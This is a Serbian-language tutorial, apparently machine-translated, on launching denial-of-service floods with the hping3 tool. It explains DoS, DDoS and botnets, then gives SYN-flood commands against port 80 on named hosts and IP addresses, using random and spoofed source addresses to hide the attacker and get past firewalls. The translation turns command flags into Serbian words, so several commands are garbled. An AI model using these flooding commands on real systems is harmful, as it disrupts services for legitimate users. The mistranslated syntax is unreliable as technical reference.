хпинг3 поплава ддос

Овај се водич фокусира на ДДОС (Дистрибутед Дениал оф Сервице) нападе помоћу алата хпинг3. Ако сте већ упознати са ДОС (ускраћивањем услуге) и ДДОС нападима, можете наставити да читате из практичних упутстава хпинг3, иначе се препоручује да сазнате како ови напади функционишу.

ДОС напади

Напад ускраћивањем услуге (ДОС) врло је једноставна техника за ускраћивање приступа услугама (зато се назива нападом „ускраћивањем услуге“). Овај напад се састоји од преоптерећења циља превеликим пакетима или њиховом великом количином.

Иако је овај напад врло лако извршити, он не угрожава информације или приватност циља, није продорни напад и само му је циљ да спречи приступ циљу.
Слањем количине пакета циљ не може да обрађује нападаче, спречавајући сервер да служи легитимним корисницима.

ДОС напади се изводе са једног уређаја, па их је лако зауставити блокирањем ИП нападача, али нападач може променити и чак подвалити (клонирати) циљну ИП адресу, али заштитним зидовима није тешко да се носе са таквим нападима , супротно ономе што се дешава са ДДОС нападима.

ДДОС напади

Дистрибуирани напад ускраћивања услуге (ДДОС) сличан је ДОС нападу, али се истовремено врши из различитих чворова (или различитих нападача). ДДОС нападе обично изводе ботнети. Ботнети су аутоматизоване скрипте или програми који заразе рачунаре да би извршили аутоматизовани задатак (у овом случају ДДОС напад). Хакер може створити ботнет и заразити многе рачунаре са којих ће ботнет покретати ДОС нападе, чињеница да многе ботнет мреже истовремено пуцају претварају ДОС напад у ДДОС напад (зато се назива „дистрибуираним“).

Наравно, постоје изузеци у којима су ДДОС нападе извршили стварни људски нападачи, на примјер хакерска група Анонимоус коју су интегрирале хиљаде људи широм свијета користиле су ову технику врло често због њене једноставне имплементације (били су потребни само добровољци који су дијелили свој циљ), то је на пример како су Анонимци оставили Гадафијеву либијску владу потпуно искљученом током инвазије, либијска држава је остала без обране пред хиљадама нападача из целог света.

Ова врста напада, када се изводи са много различитих чворова, изузетно је тешко спречити и зауставити и обично захтева посебан хардвер за бављење тим, јер заштитни зидови и одбрамбене апликације нису спремни да истовремено раде са хиљадама нападача. То није случај са хпинг3, већину напада изведених помоћу овог алата блокираће одбрамбени уређаји или софтвер, али је користан у локалним мрежама или против слабо заштићених циљева.

О хпинг3

Алат хпинг3 вам омогућава слање манипулисаних пакета. Овај алат вам омогућава контролу величине, количине и фрагментације пакета како би преоптеретили циљ и заобишли или напали заштитни зид. Хпинг3 може бити користан у сврху тестирања сигурности или тестирања способности, помоћу њега можете тестирати ефикасност заштитних зидова и ако сервер може да обрађује велику количину пакета. Испод ћете пронаћи упутства о томе како да користите хпинг3 у сврхе безбедносног тестирања.

Први кораци са ДДОС нападима помоћу хпинг3:

На дистрибуцијама Дебиана и Линук-а можете инсталирати хпинг3 покретањем:

# апт инсталирај хпинг3 -и

Једноставан ДОС (не ДДОС) напад био би:

# судо хпинг3 -С - поплава -В -п 80 170.155.9.185

Где:
судо: даје потребне привилегије за покретање хпинг3.
хпинг3: позива програм хпинг3.
-С: одређује СИН пакете.
-поплава: пуцајте по дискрецији, одговори ће се игнорисати (зато одговори неће бити приказани) и пакети ће бити послати што је брже могуће.
-В: Говорност.
-п 80: порт 80, можете заменити овај број за услугу коју желите да нападнете.
170.155.9.185: циљни ИП.

Флоод користећи СИН пакете против порта 80:

Следећи пример приказује СИН напад на лацампоре.орг:

# судо хпинг3 лацампора.орг -к -н -д 120 -С -п 80 --поплав - извор извора

Где:
Лацампора.орг: је мета
-к: кратак излаз
-н: прикажи циљану ИП уместо хоста.
-д 120: подесите величину пакета
-ранд-соурце: сакриј ИП адресу.

Следећи пример приказује још један могући пример поплаве:

СИН поплава против порта 80:

# судо хпинг3 - ранд-соурце иван.цом -С -к -п 80 --поплава

Са хпинг3 такође можете нападати своје циљеве лажном ИП адресом, да бисте заобишли заштитни зид, можете чак и клонирати саму циљну ИП адресу или било коју дозвољену адресу коју можда знате (можете је постићи, на пример, помоћу Нмап-а или њушкара за преслушавање везе).

Синтакса би била:

# судо хпинг3 -а -С -к -п 80 --брже -ц2

У овом практичном примеру напад би изгледао:

# судо хпинг3 -а 190.0.175.100 190.0.175.100 -С -к -п 80 --брже -ц2

Надам се да вам је овај водич о хпинг3 био користан. Пратите ЛинукХинт за више савета и ажурирања о Линуку и умрежавању.